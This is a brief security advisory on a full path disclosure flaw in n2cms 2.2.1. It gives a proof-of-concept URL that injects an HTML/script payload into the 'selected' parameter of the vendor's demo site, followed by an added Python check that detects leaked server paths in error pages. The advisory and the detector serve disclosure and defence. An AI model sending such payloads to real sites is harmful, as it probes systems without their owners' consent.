n2cms 2.2.1 Path Disclosure
Posted on 08 May 2015
# Affected software: n2cms
# Type of vulnerability: full path disclosure
# URL: n2cms.com
# Discovered by: provensec
# Website: provensec.com
# Version: 2.2.1 <http://n2cms.codeplex.com/releases>

# Proof of concept

http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=%2fupload%2f%22%3E%3Cimg%20src=d%20onerror=confirm(1);%3E1.php%2f

Manipulating the selected parameter triggers an error page that discloses the system path.
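A defensive check for this class of bug, added here as an example (it is not part of the original advisory or of n2cms): it scans an HTTP response body for absolute Windows paths and for the headings of ASP.NET's detailed error page. The sample responses, the paths in them and the function names are constructed for illustration.

```python
import html
import re

# Characters that cannot appear in a Windows file name; they end a match.
_BAD = r'\\/:*?"<>|\r\n'
PATH_PATTERNS = [
    # Drive-letter path; inner directories may contain spaces.
    re.compile(r"\b[A-Za-z]:\\(?:[^%s]+\\)*[^%s\s]+" % (_BAD, _BAD)),
    # UNC path: \\server\share\dir\file
    re.compile(r"\\\\[\w.-]+\\[\w$.-]+(?:\\[^%s\s]+)+" % _BAD),
]
# Headings printed by ASP.NET's detailed error page.
ERROR_MARKERS = ("Server Error in '", "Stack Trace:", "Source File:")

# Constructed sample responses (not captured from any real site).
DETAILED_ERROR = (
    "<h1>Server Error in '/' Application.</h1>\n"
    "<b>Source File:</b> C:\\inetpub\\wwwroot\\example-site\\Files\\File.aspx.cs"
    "<b> &nbsp; Line:</b> 48\n"
    "<b>Stack Trace:</b><pre>[ArgumentException: Illegal characters in path.]\n"
    "   Example.File.Page_Load() in "
    "C:\\inetpub\\wwwroot\\example-site\\Files\\File.aspx.cs:line 48\n"
    "   config: D:\\Web Sites\\example-site\\web.config line 12</pre>"
)
CUSTOM_ERROR = ('<h1>Something went wrong</h1><p>Reference 7f3a</p>'
                '<a href="/N2/Files/">Back</a>')


def find_path_disclosure(body):
    """Return (absolute paths, detailed-error markers) found in a response body."""
    text = html.unescape(body)  # error pages may HTML-encode quotes and spaces
    paths = sorted({m.group(0).rstrip(".,;)")
                    for pat in PATH_PATTERNS for m in pat.finditer(text)})
    markers = [s for s in ERROR_MARKERS if s in text]
    return paths, markers


def discloses_path(body):
    """True when the body should fail a release or monitoring check."""
    paths, markers = find_path_disclosure(body)
    return bool(paths or markers)


if __name__ == "__main__":
    for name, body in (("detailed", DETAILED_ERROR), ("custom", CUSTOM_ERROR)):
        print(name, discloses_path(body), find_path_disclosure(body)[0])
```

A body that trips this check usually means detailed errors are being served to remote clients; in ASP.NET that is governed by the customErrors setting in web.config.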
